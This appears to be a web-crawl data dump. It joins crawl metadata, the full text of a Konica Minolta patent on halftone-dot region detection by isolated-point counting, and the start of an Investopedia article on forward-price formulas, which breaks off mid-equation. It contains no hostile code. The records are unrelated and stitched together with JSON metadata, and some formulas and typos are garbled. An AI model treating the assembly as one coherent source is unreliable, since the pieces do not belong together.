January 2005" ]
[ null, "https://experts.mcmaster.ca/images/individual/uriIcon.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82565445,"math_prob":0.9838958,"size":2303,"snap":"2019-35-2019-39","text_gpt3_token_len":806,"char_repetition_ratio":0.14876033,"word_repetition_ratio":0.0,"special_character_ratio":0.31741208,"punctuation_ratio":0.15618661,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95490897,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-19T18:44:03Z\",\"WARC-Record-ID\":\"<urn:uuid:f24e6d77-ee78-4ee6-b299-b1f98b67e4e8>\",\"Content-Length\":\"26100\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:170fa50a-415f-4b86-8e84-25bd7f16f834>\",\"WARC-Concurrent-To\":\"<urn:uuid:985ab49b-ba92-4428-add1-623104bffce5>\",\"WARC-IP-Address\":\"130.113.213.148\",\"WARC-Target-URI\":\"https://experts.mcmaster.ca/display/publication1476586\",\"WARC-Payload-Digest\":\"sha1:U5Y45OMRQTYUPQRL5SW3MGGRY4GCJWQD\",\"WARC-Block-Digest\":\"sha1:5HGHWABFSV3PAWIJWU4CLILDQZCEFPZD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514573570.6_warc_CC-MAIN-20190919183843-20190919205843-00514.warc.gz\"}"}
https://patents.justia.com/patent/8988732
[ "# Image processing apparatus and image processing method\n\nIn the image processing apparatus, image data is divided into large blocks of a prescribed size and the large blocks are subdivided into small blocks by the dividing unit. The number of isolated points in each large block is then calculated by the large block isolated point calculation unit, and the number of isolated points in each small block is then calculated by the small block isolated point calculation units. It is then determined by the halftone-dot region determination unit whether or not the large block is a halftone-dot region. This determination considers both the number of isolated points in the large block and the number of isolated points in each small block.\n\n## Latest Konica Minolta Business Technologies, Inc. Patents:\n\nDescription\nCROSS-REFERENCE TO RELATED APPLICATIONS\n\nThis application is based on application No. 2002-271511 filed in Japan, the contents of which are hereby incorporated by reference.\n\nBACKGROUND OF THE INVENTION\n\n1. Field of the Invention\n\nThe present invention relates to an image processing apparatus that performs image processing, and more particularly, to an image processing apparatus that distinguishes image attributes, particularly halftone-dot regions, and performs image processing appropriate for such attributes.\n\n2. Description of the Related Art\n\nIn the conventional art, when image processing apparatuses such as printers perform printing or other processing of halftone-dot regions, the phenomenon of moiré can occur. As a result, the occurrence of moiré has been prevented by extracting halftone-dot regions from the image data and carrying out smoothing regarding the extracted halftone-dot regions. As a process for extracting halftone-dot regions from image data, a process has been proposed wherein the image data is divided into blocks having a prescribed range and it is determined whether the characteristics of each block correspond to those of a halftone-dot region (Japanese Laid-Open Patent Application 2002-27242).\n\nHowever, the following problem exists in connection with the conventional image processing apparatus described above. Namely, the image data may include figures that are determined to be isolated points, depending on the character configuration. In particular, in the case of small-sized characters (particularly characters that are 5-point or smaller), areas bordered by lines can be detected as white isolated points. Furthermore, the dot in the letter ‘i’ or the small lines at the bottom in such characters as the Japanese character may be detected as black isolated points. In addition, a dot formed by the intersection of lines may also be detected as a black isolated point. A region in which these characters are concentrated may be incorrectly determined to be a halftone-dot region even if it is not. Furthermore, because smoothing is carried out to such erroneously determined regions, the sharpness of the characters contained therein may deteriorate.\n\nSpecifically, in a halftone-dot region in which isolated points are distributed evenly as shown in FIG. 7, 12 isolated points are extracted from the block shown in FIG. 7. On the other hand, in a character region, three of the characters in a small point size may be concentrated in a single block, as shown in FIG. 8. In this situation, four white isolated points are extracted for each character . Consequently, from this character region, a total of 12 isolated points are extracted from the three characters. As a result, when the determination of whether or not a halftone-dot region exists is based on the number of isolated points, because the block in FIG. 8 contains the same number of isolated points as the halftone-dot region in FIG. 7, it is erroneously determined to be a halftone-dot region even though it is in fact a character region.\n\nOBJECTS AND SUMMARY\n\nThe present invention was created in order to resolve the problem with the technology of the prior art identified above. In other words, an object of the present invention is to provide an image processing apparatus that minimizes deterioration in output image quality by appropriately distinguishing the attributes of image areas, particularly halftone-dot regions, and performing processing properly suited to such areas.\n\nThe image processing apparatus constituting a first aspect of the present invention is an image processing apparatus that handles image data, comprising: a dividing unit which divides image data into large blocks of a prescribed size and further subdivides these large blocks into multiple smaller blocks; a large block isolated point calculation unit which calculates the number of isolated points contained in each large block established by the dividing unit; a small block isolated point calculation unit which calculates the number of isolated points contained in each small block established by the dividing unit; and a halftone-dot region determination unit which determines whether or not a large block is a halftone-dot region based on the number of isolated points calculated by the large block isolated point calculation unit and the number of the isolated points calculated by the small block isolated point calculation unit.\n\nIn this image processing apparatus, the large blocks are subdivided by the dividing unit into small blocks. The number of isolated points in each large block is then calculated by the large block isolated point calculation unit, and the number of isolated points in each small block is then calculated by the small block isolated point calculation unit. It is then determined by the halftone-dot region determination unit whether or not the large block is a halftone-dot region. This determination considers both the number of isolated points in the large block and the number of isolated points in each small block. In other words, for a large block to be determined a halftone-dot region, not only must the number of isolated points in the large block satisfy the condition for determination as a halftone-dot region, but the number of isolated points in each small block must also satisfy the condition for a halftone-dot region. This allows region attributes to be distinguished in more detail and reduces the risk of an erroneous region attribute determination.\n\nThe image processing apparatus of a second aspect of the present invention is an image processing apparatus that handles image data, comprising: a dividing unit which divides image data into multiple small blocks; a small block isolated point calculation unit which calculates the number of isolated points contained in each small block established by the dividing unit; a large block isolated point calculation unit which calculates the number of isolated points contained in a large block composed of multiple smaller blocks based on the small block isolated point totals calculated by the small block isolated point calculation unit; and a halftone-dot region determination unit which determines whether or not a large block is a halftone-dot region based on the number of isolated points calculated by the large block isolated point calculation unit and the number of isolated points calculated by the small block isolated point calculation unit. The effect described above can be obtained in this case as well.\n\nFurthermore, in these aspects of the present invention, it is preferred that the halftone-dot region determination unit determine that a large block is a halftone-dot region if the number of isolated points in the large block equals or exceeds a first prescribed value and the number of isolated points in each small block contained in the large block equals or exceeds a second prescribed value. Where a large block is a halftone-dot region, the isolated points are often evenly distributed. On the other hand, in the case of character regions, it is extremely rare for the isolated points to be evenly distributed. In other words, the halftone-dot region determination unit appropriately extracts halftone-dot regions based on such characteristics. Incidentally, the second prescribed value is smaller than the first prescribed value.\n\nThe image processing method of a third aspect of the present invention is an image processing method that handles image data and includes the following steps: (1) dividing image data into large blocks of a prescribed size and further subdividing these large blocks into multiple smaller blocks; (2) calculating the number of isolated points contained in the large block established via division and the number of isolated points contained in the small blocks established via division; and (3) determining whether or not the large block is a halftone-dot region based on the calculated number of large block isolated points and the calculated number of small block isolated points.\n\nThe image processing method of a fourth aspect of the present invention is an image processing method that handles image data and includes the following steps: (1) dividing image data into multiple small blocks; (2) calculating the number of isolated points contained in each small block established via division; (3) calculating the number of isolated points contained in a large block composed of multiple smaller blocks based on the calculated number of small block isolated points; and (4) determining whether or not the large block is a halftone-dot region based on the calculated number of large block isolated points and the calculated number of small block isolated points.\n\nThese and other objects, advantages and features of the invention will become apparent from the following description thereof taken in conjunction with the accompanying drawings which illustrate specific embodiments of the invention.\n\nBRIEF DESCRIPTION OF THE DRAWINGS\n\nFIG. 1 is a block diagram showing the functions of an image processing apparatus of an embodiment of the present invention;\n\nFIG. 2 is a block diagram showing the functions of a halftone-dot determination unit;\n\nFIG. 3 is a conceptual drawing showing a large block and small blocks in a halftone-dot region;\n\nFIG. 4 is a conceptual drawing showing a large block and small blocks in a character region;\n\nFIG. 5 is a flow chart of the operations executed by the halftone-dot determination unit;\n\nFIG. 6 is a flow chart of the isolated point counting operation;\n\nFIG. 7 is a drawing showing the isolated points in a halftone-dot region according to the conventional art; and\n\nFIG. 8 is a drawing showing the isolated points in a character region according to the conventional art.\n\nIn the following description, like parts are designated by like reference numbers throughout the several drawings.\n\nDESCRIPTION OF THE PREFERRED EMBODIMENTS\n\nA specific embodiment of the image processing apparatus pertaining to the present invention will be explained below with reference to the drawings. This embodiment takes the form of an image forming apparatus. The image processing apparatus of this embodiment has a color conversion unit 1, a region determination unit 2, an edge reproduction unit 5 and an image forming engine 6, as shown in FIG. 1. The region determination unit 2 has a character determination unit 3 and a halftone-dot determination unit 4. The color conversion unit 1, character determination unit 3 and halftone-dot determination unit 4 receive input of image data.\n\nThe various constituent components shown in FIG. 1 will now be described. The color conversion unit 1 converts input image data from RGB input system signals to CMYK output system signals, for example. At the same time, the region determination unit 2 determines the attributes of the regions comprising the input image data. The character determination unit 3 of the region determination unit 2 determines the existence of character regions (regions containing fine lines) in the input image data and generates a signal for each pixel indicating whether or not the pixel is a character region. Similarly, the halftone-dot determination unit 4 of the region determination unit 2 determines the existence of halftone-dot regions and generates signals indicating whether or not each pixel is a halftone-dot region. The edge reproduction unit 5 carries out correction processing such as edge enhancement and smoothing to the image data output by the color conversion unit 1 in accordance with the signals output from the region determination unit 2. The image forming engine 6 forms images on a medium such as paper based on the image data output by the edge reproduction unit 5. The image forming engine 6 may use any method to form images based on image data, including the electrophotographic method that employs a photosensitive body and toner or the inkjet method.\n\nThe halftone-dot determination unit 4 will now be described. As shown in FIG. 2, the halftone-dot determination unit 4 includes a dividing unit 40, isolated point counters 41, 42, 43, 44 and 45, an adder 46, a comparator 47, an OR circuit 48 and an AND circuit 49. The dividing unit 40 divides the image area into blocks (hereinafter termed ‘large blocks’) having a size of M×N pixels, and further divides these large blocks into smaller blocks (hereinafter termed ‘small blocks’) having a size of (i)×(j) pixels. The isolated point counters each count the number of isolated points in a small block. The adder 46 adds up the total number of isolated points counted by the isolated point counters 41-45 and deems this number the number of isolated points in a large block. The comparator 47 compares the number of large block isolated points with a threshold value. The image processing apparatus of this embodiment divides the large block into five small blocks {circle around (1)} through {circle around (5)}, and includes the isolated point counters 41-45 that correspond to these small blocks. The sizes of the small and large blocks may be set appropriately in accordance with the type of halftone-dot region to be detected. For example, the small blocks may be set at 5×5 pixels and the large blocks set at 5×25 pixels.\n\nThe operation of the halftone-dot determination unit 4 will now be described. First, the image data is sent to the dividing unit 40. The sent image data is divided into large blocks by the dividing unit 40. The large blocks are then further divided into five small blocks. In other words, each large block is divided into five contiguous small blocks {circle around (1)} through {circle around (5)} by being divided into five sections as shown in FIG. 3. The image data for each small block is sent to the isolated point counter 41-45 corresponding to that small block.\n\nThe number of isolated points is counted for each region by the respective isolated point counters 41-45 and the number of isolated points is obtained for each region. For example, for the image data shown in FIG. 3, the number of isolated points in the small block {circle around (1)} is counted by the isolated point counter 41. Because three isolated points exist in the small block {circle around (1)}, the number of isolated points in the small block {circle around (1)} is ‘3’. The number of small block isolated points obtained by the five isolated point counters is then sent to the adder 46 and the OR circuit 48.\n\nThe total number of isolated points in the small blocks {circle around (1)} through {circle around (5)} is then calculated by the adder 46, and the number of isolated points in the large block is thereby obtained. For example, for the image data shown in FIG. 3, the two or three isolated points present in each of the small blocks are counted by the corresponding isolated point counter, and the total of twelve is obtained as the number of isolated points in the large block. This number of large block isolated points is then sent to the comparator 47.\n\nThe comparator 47 compares the number of large block isolated points that it has received with a prescribed threshold value. If the number of large block isolated points exceeds the threshold value, the comparator 47 sends an ‘H’ signal to the AND circuit 49, while if the number of large block isolated points is less than the threshold value, the comparator 47 sends an ‘L’ signal to the AND circuit 49.\n\nIf the output value from all of the isolated point counters 41-45 is ‘0’, the OR circuit 48 outputs an ‘L’ signal to the AND circuit 49, while if any other value is obtained, OR circuit 48 outputs an ‘H’ signal to the AND circuit 49. In other words, where the input number of isolated points is expressed as a binary number, if any ‘1’ component is contained in the binary number, ‘H’ is output. Therefore, if no isolated points exist in the small block, ‘L’ is output, while if even one isolated point is counted, ‘H’ is out put. In addition, the OR circuit 48 performs calculation for each isolated point counter (small block) and sends the result to the AND circuit 49.\n\nNext, a halftone-dot region signal is output by the AND circuit 49 based on the output result from the OR circuit 48 and the output result from the comparator 47. Specifically, where the output value from the comparator 47 is ‘H’ and all values output from the OR circuit 48 are ‘H’, a halftone-dot region signal indicating that the region constituting this large block is a halftone-dot region is output. Here, in the case of a halftone-dot region, there is a high probability that the isolated points in an area of at least a certain size will be distributed evenly within that area, as shown in the image of FIG. 3. On the other hand, in the case of a character region, it is extremely unlikely that the isolated points in an area of at least a certain size will be distributed evenly within that area, and even in an area having contiguous characters, such an even distribution over a large area is highly unlikely, as shown in the image of FIG. 4. In other words, the halftone-dot determination unit 4 extracts halftone-dot regions based on these region characteristics.\n\nA specific example will be described based on the image data shown in FIG. 3 (halftone-dot region) and FIG. 4 (character region). Here, the threshold value to which the number of large block isolated points is compared (used by the comparator 47 in FIG. 2) is a number smaller than 12. First, in the image data shown in FIG. 3, there are 12 isolated points in the large block, and ‘H’ is output by the comparator 47. Furthermore, two or three isolated points are present in each small block, and the values output from the OR circuit 48 are all ‘H’. Therefore, a halftone-dot region signal indicating that the region constituting this large block is a halftone-dot region is output by the AND circuit 49. Similarly, in the image data shown in FIG. 4, there are 12 isolated points in the large block, and ‘H’ is output by the comparator 47. However, two of the small blocks (the small blocks {circle around (1)} and {circle around (5)} in FIG. 4) contain no isolated points. Therefore, the values output by the OR circuit 48 include ‘L’. Accordingly, regardless of the output result from the comparator 47, the AND circuit 49 outputs a halftone-dot region signal indicating that the area constituting the large block is not a halftone-dot region.\n\nThe processing executed by the halftone-dot determination unit 4 will now be described using the flow chart shown in FIG. 5. First, the total number of isolated points in the large block (hereinafter termed the ‘total isolated points’) is initialized (S1). In this initialization, processing to divide the image data into large blocks and small blocks is carried out. The number of isolated points in any particular small block is then sought (S2). It is then determined whether or not the number of isolated points obtained in step S2 was ‘0’ (S3). If the number of isolated points was ‘0’ (YES in S3) it is determined that the large block is not a halftone-dot region (S7), and the routine ends. If the number of isolated points was not ‘0’, on the other hand (NO in S3), the counted number of small block isolated points is added to the total isolated points (S4). It is then determined whether or not there are any other small blocks for which the number of isolated points has not yet been sought (S5). If other such small blocks exist (YES in S5), the operations beginning with step S2 are repeated regarding these small blocks. If no other small blocks exist, on the other hand (NO in S5), it is determined whether or not the total isolated points exceeds a threshold value (S6). If the total isolated points is larger than the threshold value (YES in S6), it is determined that the large block is a halftone-dot region (S8) and the routine ends. If the threshold value is larger than the total isolated points, however (NO in S6), it is determined that the large block is not a halftone-dot region (S7) and the routine ends.\n\nThe operation (S2) by which the number of isolated points is sought will now be described with reference to the flow chart of FIG. 6. First, the number of isolated points is initialized (S21). It is then determined whether or not the selected pixel is a pixel that displays an isolated point (hereinafter termed an ‘isolated point pixel’) (S22). If it is an isolated point pixel (YES in S22), the number of isolated points is increased by one (S23). If the selected pixel is not an isolated point pixel, on the other hand (NO in S22), or after the operation of S23 is completed, it is determined whether or not other pixels exist in that small block as to which isolated point pixel determination has not been performed (S24). If such other pixels exist (YES in S5), the operations beginning with step S22 are repeated for such pixels. If no other such pixels exist, however (NO in S5), the routine ends.\n\nBecause various methods are known in the art for determining the existence of isolated point pixels (S22), details thereof will be omitted here, but it is acceptable if, for example, using a filter of 3×3 pixels centered on the focus pixel, it is determined that the focus pixel is an isolated point pixel where the focus pixel is a black pixel and all of the pixels surrounding the focus pixel are white pixels. Furthermore, although in this example black isolated points are sought, the accuracy of halftone-dot determination is improved by seeking white isolated points as well. In determining the existence of white isolated points, it is acceptable if, for example, using a filter of 3×3 pixels centered on the focus pixel, it is determined that the focus pixel is an isolated point pixel where the focus pixel is a white pixel and all of the pixels surrounding the focus pixel are black pixels.\n\nThe dividing unit 40 of this embodiment divides into small blocks the large blocks previously obtained via division, but it may instead first divide the entire image data into small blocks and then aggregate the small blocks into large blocks. In this case, after the image data is divided into small blocks, areas of a certain size formed by contiguous small blocks are deemed large blocks.\n\nThe edge reproduction unit 5 performs smoothing based on halftone-dot region signals. The areas to which smoothing is performed are halftone-dot regions, and smoothing is not performed to other areas, i.e., character regions. The image forming engine 6 forms images based on the image data that underwent smoothing by the edge reproduction unit 5.\n\nAs described in detail above, in this embodiment, the image data input by the dividing unit 40 is divided into large blocks and small blocks. The number of isolated points in each of the various small blocks is then calculated by the isolated point counters 41-45. The adder 46 calculates the number of large block isolated points by adding together the number of isolated points counted by each of the isolated point counters. The comparator 47 compares the number of large block isolated points with a threshold value. The number of isolated points obtained by each isolated point counter is sent to the AND circuit 49 via the OR circuit 48. In other words, data indicating whether or not isolated points exist in each small block is sent. The AND circuit 49 determines that the large block is a halftone-dot region only where the large block isolated point total exceeds a threshold value and isolated points exist in each of the small blocks comprising the large block, and this result is output as a halftone-dot region signal. This is because the probability that the large block is not a halftone-dot region is high where the large block includes at least one small block that contains no isolated points. As a result, erroneous region determination can be minimized. Therefore, an image processing apparatus offering minimal deterioration in output image quality can be realized by appropriately determining the attributes of each area within the image data and carrying out appropriate processing for each area.\n\nThis embodiment constitutes a mere example of the present invention, which is not limited in any way thereby. Therefore the present invention may naturally be modified or improved in various ways within the essential scope of the invention. For example, the image forming destination for the image processing apparatus is not limited to paper, and such image forming may be carried out on a display device such as a personal computer.\n\nIn this embodiment, the large blocks were formed with a horizontal orientation as shown in the drawings, but the present invention is not limited to this implementation. In other words, the large blocks may be oriented both horizontally and vertically. However, where the large blocks are oriented both horizontally and vertically, the burden on the memory and the processing system increases, and therefore it is preferred that they be divided in one direction only.\n\nIn this embodiment, the number of isolated point(s) for each of the small blocks was sent to the OR circuit 48, but the present invention is not limited to this implementation. In other words, it is not necessary that the small blocks for which the isolated point totals are sent consist of all small blocks or even contiguous small blocks. It is acceptable if areas that are away from each other in a large block are extracted for final halftone-dot determination. For example, it is acceptable if the small blocks {circle around (1)}, {circle around (3)} and {circle around (5)} are extracted from the image data shown in FIG. 3 and the number of isolated points for only these small blocks is sent to the OR circuit 48.\n\nIn this embodiment, the isolated point totals counted by the isolated point counters are sent to the AND circuit 49 via all of the OR circuits 48, but the present invention is not limited to this implementation. In other words, it is acceptable if a single ‘H’ signal is output when isolated points exist in all of the small blocks, while an ‘L’ signal is output when any small block does not contain any isolated points, and the AND circuit 49 outputs a halftone-dot region signal based on the signal output from the OR circuit 48 and the signal output from the comparator 47.\n\nAs is clear from the above description, according to the present invention, by appropriately determining the attributes of areas of the image data and executing appropriate processing with respect to such areas, an image processing apparatus offering minimal deterioration in output image quality can be provided.\n\nAlthough the present invention has been fully described by way of examples with reference to the accompanying drawings, it is to be noted that various changes and modifications will be apparent to those skilled in the art. Therefore, unless such changes and modifications otherwise depart from the scope of the present invention, they should be construed as being included herein.\n\n## Claims\n\n1. An image processing apparatus that handles image data, comprising:\n\na dividing unit for dividing image data into large blocks of a prescribed size and further subdividing the large blocks into multiple smaller blocks;\na large block isolated point calculation unit for calculating a first number of isolated points contained in each large block established by said dividing unit;\na small block isolated point calculation unit for calculating a respective second number of isolated points contained in each small block established by said dividing unit; and\na halftone-dot region determination unit for determining that a specified large block among the large blocks established by the dividing unit is a halftone-dot region if all small blocks in the specified large block have an isolated point contained therein, based on the respective second numbers calculated by the small block isolated point calculation unit, and if the first number of isolated points calculated to be contained in the specified large block by the large block isolated point calculation unit is greater than or equal to a first prescribed value.\n\n2. An image processing apparatus as claimed in claim 1,\n\nwherein said halftone-dot region determination unit is operable to determine that the specified large block is a halftone-dot region if the respective second number of isolated points in each small block contained in the large block is greater than or equal to a second prescribed value.\n\n3. An image processing apparatus as claimed in claim 2,\n\nwherein the second prescribed value is smaller than the first prescribed value.\n\n4. An image processing apparatus as claimed in claim 1, further comprising:\n\nan image processing unit for correcting the image data based on the results of determination by said halftone-dot region determination unit.\n\n5. An image processing apparatus as claimed in claim 4, further comprising:\n\nan image forming unit for performing image formation based on the image data corrected by said image processing unit.\n\n6. An image processing apparatus that handles image data, comprising:\n\na dividing unit for dividing image data into multiple small blocks;\na small block isolated point calculation unit for calculating a respective first number of isolated points contained in each small block established by said dividing unit;\na large block isolated point calculation unit for calculating a second number of isolated points contained in a large block of the image data, the large block being composed of multiple smaller blocks based on an aggregated amount of the respective first number of isolated points calculated by said small block isolated point calculation unit; and\na halftone-dot region determination unit for determining that the large block is a halftone-dot region if all small blocks in the large block have an isolated point contained therein, based on the respective first number of isolated points calculated by the small block calculation unit, and if the second number of isolated points calculated to be contained in the large block by the large block isolated point calculation unit is greater than or equal to a first prescribed value.\n\n7. An image processing apparatus as claimed in claim 6,\n\nwherein said halftone-dot region determination unit is operable to determine that the respective first number of isolated points in each small block contained in the large block is greater than or equal to a second prescribed value.\n\n8. An image processing apparatus as claimed in claim 7,\n\nwherein the second prescribed value is smaller than the first prescribed value.\n\n9. An image processing apparatus as claimed in claim 6, further comprising:\n\nan image processing unit for correcting the image data based on the results of determination by said halftone-dot region determination unit.\n\n10. An image processing apparatus as claimed in claim 9, further comprising:\n\nan image forming unit for performing image formation based on the image data corrected by said image processing unit.\n\n11. An image processing method that handles image data, said method comprising the steps of:\n\ndividing, in processing circuitry of an image processing apparatus, image data into large blocks of a prescribed size and further subdividing the large blocks into multiple smaller blocks;\ncalculating, in the processing circuitry of the image processing apparatus, a first respective number of isolated points contained in each large block established via division and a respective second number of isolated points contained in each small block established via division; and\ndetermining, in the processing circuitry of the image processing apparatus, that a specified large block among the large blocks established via division is a halftone-dot region if all small blocks in the specified large block have an isolated point contained therein, based on the calculated respective second numbers of each small block contained in the specified large block, and if the first number of isolated points calculated to be contained in the specified large block is greater than or equal to a first prescribed value.\n\n12. An image processing method as claimed in claim 11,\n\nwherein said determining step comprises determining that the specified large block is a halftone-dot region if the respective second number of isolated points in each small block contained in the large block is greater than or equal to a second prescribed value.\n\n13. An image processing method as claimed in claim 12,\n\nwherein the second prescribed value is smaller than the first prescribed value.\n\n14. An image processing method that handles image data, said method comprising the steps of:\n\ndividing, in processing circuitry of the image processing apparatus, image data into multiple small blocks;\ncalculating, in the processing circuitry of the image processing apparatus, a respective first number of isolated points contained in each small block established via division;\ncalculating, in the processing circuitry of the image processing apparatus, a respective second number of isolated points contained in a large block of the image data, the large block being composed of multiple smaller blocks based on the calculated number of small block isolated points; and\ndetermining, in the processing circuitry of the image processing apparatus, that the large block is a halftone-dot region if all small blocks in the large block have an isolated point contained therein, based on the calculated respective first number of isolated points in the small blocks contained in the large block, and if calculated second number of isolated points contained in the large block is greater than or equal to a first prescribed value.\n\n15. An image processing method as claimed in claim 14,\n\nwherein said determining step comprises determining that the large block is a halftone-dot region if the respective first number of isolated points in each small block contained in the large block is greater than or equal to a second prescribed value.\n\n16. An image processing method as claimed in claim 15,\n\nwherein the second prescribed value is smaller than the first prescribed value.\n\n17. An image processing apparatus as claimed in claim 5, further comprising a character determination unit for determining whether at least one character region exists in the image data, wherein:\n\nsaid image processing unit is operable to correct the image data based on the results of determination by said halftone-dot region determination unit and said character determination unit; and\nsaid image forming unit is operable to perform image formation based on the image data corrected by said image processing unit.\n\n18. An image processing apparatus as claimed in claim 1, wherein said small block isolated point calculation unit comprises a plurality of isolated point counters respectively corresponding to the multiple small blocks contained in a large block, each of said plurality of isolated point counters being operable to count the respective second number of isolated points contained in a corresponding one of the small blocks contained in the large block.\n\n19. An image processing apparatus as claimed in claim 18, wherein said halftone-dot region determination unit comprises:\n\na first determination unit for determining whether the calculated first number of isolated points in a large block equals or exceeds the first threshold value;\na second determination unit for determining whether each of said plurality of isolated point counters of said small block isolated point calculation unit have each counted at least one isolated point in the corresponding small block contained in the large block; and\na third determination unit for determining whether the large block is a halftone-dot region based on the determination results of said first determination unit and second determination unit.\n\n20. An image processing apparatus as claimed in claim 19, wherein said third determination unit is operable to determine that the large block is a halftone-dot region if said first determination unit determines that the calculated first number of isolated points in the large blocks equals or exceeds the first threshold value, and said second determination unit determines that each of said isolated point counters have counted at least one isolated point in the corresponding small block contained in the large block.\n\n21. An image processing apparatus as claimed in claim 6, wherein the second number of isolated points contained in the large block equals an aggregate of the respective first number of isolated points that said small block isolated point calculation unit calculates for each small block composing the large block.\n\n22. An image processing apparatus as claimed in claim 6, wherein said large block isolated point calculation unit is operable to calculate the second number of isolated points contained in the large block by calculating an aggregate of the respective first number of isolated points contained in a plurality of contiguous small blocks within a predetermined area of the image data.\n\n23. An image processing apparatus as claimed in claim 9, further comprising a character determination unit for determining whether at least one character region exists in the image data, wherein:\n\nsaid image processing unit is operable to correct the image data based on the results of determination by said halftone-dot region determination unit and said character determination unit; and\nsaid image forming unit is operable to perform image formation based on the image data corrected by said image processing unit.\n\n24. An image processing method as claimed in claim 11, further comprising the steps of:\n\ncorrecting the image data based on the results of determination of said determining step; and\nforming images based on the corrected image data.\n\n25. An image processing method as claimed in claim 14, further comprising the steps of:\n\ncorrecting the image data based on the results of determination of said determining step; and\nforming images based on the corrected image data.\nPatent History\nPatent number: 8988732\nType: Grant\nFiled: Sep 16, 2003\nDate of Patent: Mar 24, 2015\nPatent Publication Number: 20040125409\nAssignee: Konica Minolta Business Technologies, Inc. (Chiyoda-Ku, Tokyo)\nInventors: Tomohiro Yamaguchi (Shinshiro), Yoshihiko Hirota (Toyokawa)\nPrimary Examiner: Quang N Vo\nApplication Number: 10/662,443\nClassifications" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9268999,"math_prob":0.96939087,"size":30870,"snap":"2020-10-2020-16","text_gpt3_token_len":5930,"char_repetition_ratio":0.24791032,"word_repetition_ratio":0.43365696,"special_character_ratio":0.19248462,"punctuation_ratio":0.0732342,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9681591,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-03T09:13:45Z\",\"WARC-Record-ID\":\"<urn:uuid:22917240-fcec-4273-bac1-3d9609b59e2f>\",\"Content-Length\":\"93617\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c502ee4c-461d-4a78-804a-c52428328337>\",\"WARC-Concurrent-To\":\"<urn:uuid:75639c79-23c5-4ff6-9ef9-01c81d2bc748>\",\"WARC-IP-Address\":\"52.200.236.247\",\"WARC-Target-URI\":\"https://patents.justia.com/patent/8988732\",\"WARC-Payload-Digest\":\"sha1:DHVYNPTWUZVS47WXFXEPAUEGKXKBJTH4\",\"WARC-Block-Digest\":\"sha1:VPUPK4554ZQ2WSJYH64OVPK3TLYKKZ2A\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370510352.43_warc_CC-MAIN-20200403061648-20200403091648-00259.warc.gz\"}"}
https://www.investopedia.com/terms/f/forwardprice.asp
[ "• General\n• Personal Finance\n• Reviews & Ratings\n• Wealth Management\n• Popular Courses\n• Courses by Topic\n\n# Forward Price: Definition, Formulas for Calculation, and Example\n\n## What is a Forward Price\n\nForward price is the predetermined delivery price for an underlying commodity, currency, or financial asset as decided by the buyer and the seller of the forward contract, to be paid at a predetermined date in the future. At the inception of a forward contract, the forward price makes the value of the contract zero, but changes in the price of the underlying will cause the forward to take on a positive or negative value.\n\nThe forward price is determined by the following formula:\n\n \\begin{aligned} &F_0 = S_0 \\times e^{rT} \\\\ \\end{aligned}\n\n## Basics of Forward Price\n\nForward price is based on the current spot price of the underlying asset, plus any carrying costs such as interest, storage costs, foregone interest or other costs or opportunity costs.\n\nAlthough the contract has no intrinsic value at the inception, over time, a contract may gain or lose value. Offsetting positions in a forward contract are equivalent to a zero-sum game. For example, if one investor takes a long position in a pork belly forward agreement and another investor takes the short position, any gains in the long position equals the losses that the second investor incurs from the short position. By initially setting the value of the contract to zero, both parties are on equal ground at the inception of the contract.\n\n### Key Takeaways\n\n• Forward price is the price at which a seller delivers an underlying asset, financial derivative, or currency to the buyer of a forward contract at a predetermined date.\n• It is roughly equal to the spot price plus associated carrying costs such as storage costs, interest rates, etc.\n\n## Forward Price Calculation Example\n\nWhen the underlying asset in the forward contract does not pay any dividends, the forward price can be calculated using the following formula:\n\n \\begin{aligned} &F = S \\times e ^ { (r \\times t) } \\\\ &\\textbf{where:} \\\\ &F = \\text{the contract's forward price} \\\\ &S = \\text{the underlying asset's current spot price} \\\\ &e = \\text{the mathematical irrational constant approximated} \\\\ &\\text{by 2.7183} \\\\ &r = \\text{the risk-free rate that applies to the life of the} \\\\ &\\text{forward contract} \\\\ &t = \\text{the delivery date in years} \\\\ \\end{aligned}\n\nFor example, assume a security is currently trading at 100 per unit. An investor wants to enter into a forward contract that expires in one year. The current annual risk-free interest rate is 6%. Using the above formula, the forward price is calculated as:  \\begin{aligned} &F = \\100 \\times e ^ { (0.06 \\times 1) } = \\106.18 \\\\ \\end{aligned} If the there are carrying costs, that is added into the formula:  \\begin{aligned} &F = S \\times e ^ { (r + q) \\times t } \\\\ \\end{aligned} Here, q is the carrying costs. If the underlying asset pays dividends over the life of the contract, the formula for the forward price is:  \\begin{aligned} &F = ( S - D ) \\times e ^ { ( r \\times t ) } \\\\ \\end{aligned} Here, D equals the sum of each dividend's present value, given as:  \\begin{aligned} D =& \\ \\text{PV}(d(1)) + \\text{PV}(d(2)) + \\cdots + \\text{PV}(d(x)) \\\\ =& \\ d(1) \\times e ^ {- ( r \\times t(1) ) } + d(2) \\times e ^ { - ( r \\times t(2) ) } + \\cdots + \\\\ \\phantom{=}& \\ d(x) \\times e ^ { - ( r \\times t(x) ) } \\\\ \\end{aligned} Using the example above, assume that the security pays a 50-cent dividend every three months. First, the present value of each dividend is calculated as:  \\begin{aligned} &\\text{PV}(d(1)) = \\0.5 \\times e ^ { - ( 0.06 \\times \\frac { 3 }{ 12 } ) } = \\0.493 \\\\ \\end{aligned}  \\begin{aligned} &\\text{PV}(d(2)) = \\0.5 \\times e ^ { - ( 0.06 \\times \\frac { 6 }{ 12 } ) } = \\0.485 \\\\ \\end{aligned}  \\begin{aligned} &\\text{PV}(d(3)) = \\0.5 \\times e ^ { - ( 